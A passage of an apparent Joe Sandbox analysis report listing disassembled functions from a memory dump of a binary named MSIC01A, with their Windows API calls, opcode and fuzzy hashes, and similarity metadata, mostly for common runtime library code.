                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                                                        • String ID: utf8
                                                                                                                                                                        • API String ID: 4147378913-905460609
                                                                                                                                                                        • Opcode ID: bdadae32460b93624daea2234373c4ec2ff8033dca0c055f8a0d2c694d515d51
                                                                                                                                                                        • Instruction ID: 895c7d7d596d377e7df42f00d88757584701475111c9f06b1bd77a1c3d8567df
                                                                                                                                                                        • Opcode Fuzzy Hash: bdadae32460b93624daea2234373c4ec2ff8033dca0c055f8a0d2c694d515d51
                                                                                                                                                                        • Instruction Fuzzy Hash: AB711476F00306AADB24AB74CC46BBB73A8EF54710F144429F906DB181EBB5E940B7A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F33860 Relevance: 10.7, APIs: 7, Instructions: 227processCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F338CB
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F3390B
                                                                                                                                                                        • Process32FirstW.KERNEL32(?,00000000), ref: 00F3395F
                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00F3397A
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F33A8E
                                                                                                                                                                        • Process32NextW.KERNEL32(?,00000000), ref: 00F33AA2
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00F33AF0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 708755948-0
                                                                                                                                                                        • Opcode ID: b0318c1c989ff34d3047ce48bae127a2a285a2f1053fff4680c5acdf719242c9
                                                                                                                                                                        • Instruction ID: c7ade17b9d8160e54a59b59a50d27db97a946841b1d6cca9897436d56b690295
                                                                                                                                                                        • Opcode Fuzzy Hash: b0318c1c989ff34d3047ce48bae127a2a285a2f1053fff4680c5acdf719242c9
                                                                                                                                                                        • Instruction Fuzzy Hash: 3CA13BB1D01249DFDF10DFA8D988BDEBBF8BF48314F144159E805AB281D7785A44DBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F6F032 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __floor_pentium4
                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                                                                        • Opcode ID: b9dc25283c1903fe007068dbed81c78d065dc5c25247a3b995f97b1be4b54517
                                                                                                                                                                        • Instruction ID: 5764354e4cec2fca04e3094c2f423cc1a466dbc15dcb3f6f1c8f0c2d1660d0c5
                                                                                                                                                                        • Opcode Fuzzy Hash: b9dc25283c1903fe007068dbed81c78d065dc5c25247a3b995f97b1be4b54517
                                                                                                                                                                        • Instruction Fuzzy Hash: 0AD23A72E082298FDB65CF28DD407EAB7B5EB44315F1441EAD80DE7240DB78AE859F41
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F6E5B3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00F6E8D1,00000002,00000000,?,?,?,00F6E8D1,?,00000000), ref: 00F6E64C
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,00F6E8D1,00000002,00000000,?,?,?,00F6E8D1,?,00000000), ref: 00F6E675
                                                                                                                                                                        • GetACP.KERNEL32(?,?,00F6E8D1,?,00000000), ref: 00F6E68A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                        • Opcode ID: 8291b68b0c401bbb74f2384d76e54190d99d4d117e1e40c328a735c95b2f72e8
                                                                                                                                                                        • Instruction ID: 72c4d41202be0dce734e9351fc94b7378d3245af49913e5afb9bb0698f628b90
                                                                                                                                                                        • Opcode Fuzzy Hash: 8291b68b0c401bbb74f2384d76e54190d99d4d117e1e40c328a735c95b2f72e8
                                                                                                                                                                        • Instruction Fuzzy Hash: D221AC3BF20201AADB348F14C904B9773A6AB74B74B5A8464E90AD7111FB33DE41F791
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F39CC0 Relevance: 7.9, APIs: 5, Instructions: 441COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _swprintf$FreeLocal
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2429749586-0
                                                                                                                                                                        • Opcode ID: 7f43bd105ea24fdfac51ad8d481aeb0eea0d4d1c4c07bd5459bc0667e9c0faec
                                                                                                                                                                        • Instruction ID: 75d67f86ce2d40f9310e43e2b22f1a8f295e71eb05c9dcf7abf2a60f572d9ba2
                                                                                                                                                                        • Opcode Fuzzy Hash: 7f43bd105ea24fdfac51ad8d481aeb0eea0d4d1c4c07bd5459bc0667e9c0faec
                                                                                                                                                                        • Instruction Fuzzy Hash: 76F1BE71D04219AFDF19DFA8DC41BAEBBB5FF08320F144229F911A7280D7B5A941DBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F6E788 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                          • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00F6E894
                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00F6E8DD
                                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00F6E8EC
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00F6E934
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00F6E953
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 415426439-0
                                                                                                                                                                        • Opcode ID: dada088d2f96faea6fa744cbe7ca5f96b2d751f6276822f7115e3bcde02ccbb7
                                                                                                                                                                        • Instruction ID: c0303c608ee64c13a7a42e931daa644f0d19da5afd7162a96162f0f0ad9e8c5f
                                                                                                                                                                        • Opcode Fuzzy Hash: dada088d2f96faea6fa744cbe7ca5f96b2d751f6276822f7115e3bcde02ccbb7
                                                                                                                                                                        • Instruction Fuzzy Hash: C1517E76E00209AFEB20EFB5CC45ABE73B8AF49710F144069E914E7190E7B49944EBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F65D6D Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3213747228-0
                                                                                                                                                                        • Opcode ID: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                                                                                                        • Instruction ID: 61d7d7eb227164e54688aeba2326475a250930e0601a2bf4cc9aaa9bed8636b2
                                                                                                                                                                        • Opcode Fuzzy Hash: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                                                                                                        • Instruction Fuzzy Hash: 19B15672D04645AFDB15CF68C881BEEBBA5EF59310F14816AE804FB242D239DD01EBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F533A8 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F533B4
                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00F53480
                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F534A0
                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00F534AA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 254469556-0
                                                                                                                                                                        • Opcode ID: 68dff0615bb75680bf9f5f992ccf45fa351fabff1ceffda194fd6f103f0c51de
                                                                                                                                                                        • Instruction ID: 524c7afd3037bd154dc8a8ca949bc6bb907ee943dd9ca2da538a3a1df190e33d
                                                                                                                                                                        • Opcode Fuzzy Hash: 68dff0615bb75680bf9f5f992ccf45fa351fabff1ceffda194fd6f103f0c51de
                                                                                                                                                                        • Instruction Fuzzy Hash: 66314975D0531C9BDB10EFA4DD89BCDBBB8AF08305F1040AAE50CAB250EB759B899F45
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F3D0A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F3C630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,72A902E8,?,00F73D30,000000FF), ref: 00F3C657
                                                                                                                                                                          • Part of subcall function 00F3C630: GetLastError.KERNEL32(?,00000000,00000000,72A902E8,?,00F73D30,000000FF), ref: 00F3C661
                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,00F88AF0), ref: 00F3D0D8
                                                                                                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00F88AF0), ref: 00F3D0E7
                                                                                                                                                                        Strings
                                                                                                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F3D0E2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                        • API String ID: 3511171328-631824599
                                                                                                                                                                        • Opcode ID: dc381ec7efab9c925ff37426d8ad44cdf2f2b11872b9025d8131d8941b3ec6c0
                                                                                                                                                                        • Instruction ID: bfcadaceaad7dc45005ddf5daa6423141c1f1bfed2cd23f06f479c3fbca70550
                                                                                                                                                                        • Opcode Fuzzy Hash: dc381ec7efab9c925ff37426d8ad44cdf2f2b11872b9025d8131d8941b3ec6c0
                                                                                                                                                                        • Instruction Fuzzy Hash: EFE09BB01187414FD324BF34E8047427BE4AF14720F00886DE459D2651DBB4D488EBA3
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F6E237 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                          • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F6E28B
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F6E2D5
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F6E39B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale$ErrorLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 661929714-0
                                                                                                                                                                        • Opcode ID: 463d17204d394063bf0bd5c8efd46ac12dc5f8f4353d9ab505c2526a573ff893
                                                                                                                                                                        • Instruction ID: e64e9d01afc618eb613bd92592f4d42f6d10f1bed61e560c2bdc7508d3cb4d98
                                                                                                                                                                        • Opcode Fuzzy Hash: 463d17204d394063bf0bd5c8efd46ac12dc5f8f4353d9ab505c2526a573ff893
                                                                                                                                                                        • Instruction Fuzzy Hash: BD619E7A9102079FEB28DF28CC82BBA77A8EF14311F104179ED05C7285EB78D995EB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F56E1B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00F56F13
                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00F56F1D
                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00F56F2A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                        • Opcode ID: a7b38f1ae563dc59d8b17739105a1bc0378e9439abb735733fed43cb2529b756
                                                                                                                                                                        • Instruction ID: d571078a2c3eeaa063c504e4f68ac653e246a0b113f236d03732f52babee6ba5
                                                                                                                                                                        • Opcode Fuzzy Hash: a7b38f1ae563dc59d8b17739105a1bc0378e9439abb735733fed43cb2529b756
                                                                                                                                                                        • Instruction Fuzzy Hash: 6C31D274D0122CABCB21DF68DD8978DBBB8AF08311F5041EAE91CA7290E7749B859F45
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F345B0 Relevance: 4.6, APIs: 3, Instructions: 64COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,72A902E8,00000001,00000000,?,00000000,00F74460,000000FF,?,00F3474D,00F33778,?,00000000,00000000,?), ref: 00F345DB
                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,00000000,00F74460,000000FF,?,00F3474D,00F33778,?,00000000,00000000,?,?,?,?,00F33778), ref: 00F345E6
                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00000000,00F74460,000000FF,?,00F3474D,00F33778,?,00000000,00000000,?,?,?), ref: 00F345F4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Resource$LoadLockSizeof
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2853612939-0
                                                                                                                                                                        • Opcode ID: 1963a2753b14aed351c83e1bb305f06eae1e69f13be0c610b306c0066d0f631c
                                                                                                                                                                        • Instruction ID: 089788068f2cff7e507da65f31771bc4f0926189e41acd24acf59d87f6bb3800
                                                                                                                                                                        • Opcode Fuzzy Hash: 1963a2753b14aed351c83e1bb305f06eae1e69f13be0c610b306c0066d0f631c
                                                                                                                                                                        • Instruction Fuzzy Hash: 2C11C632E046589BC7359F59DC55B66F7FCE785735F00452AEC1AD3250EB35BC009690
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F5E270 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                                                                                                        • Instruction ID: 38e9b64328072e31f60f3f8581d6a28a92afe0915ad9bda8fb339108800f693b
                                                                                                                                                                        • Opcode Fuzzy Hash: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                                                                                                        • Instruction Fuzzy Hash: 9DF14F75E002199FDF18CF68C9806ADBBB1FF98325F158269E915EB381D730AE05DB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F67B1F Relevance: 1.9, APIs: 1, Instructions: 408timeCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00F67F64,00000000,00000000,00000000), ref: 00F67E23
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationTimeZone
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 565725191-0
                                                                                                                                                                        • Opcode ID: 37f2790e8954fcd10a80cd05a26a6be4383d9fc03aae74a9e1301627f457981f
                                                                                                                                                                        • Instruction ID: 3b78e7bc12ae1ab00268f03ffad6e164baebd6832a4a0b94cb3c86382bc8a2c0
                                                                                                                                                                        • Opcode Fuzzy Hash: 37f2790e8954fcd10a80cd05a26a6be4383d9fc03aae74a9e1301627f457981f
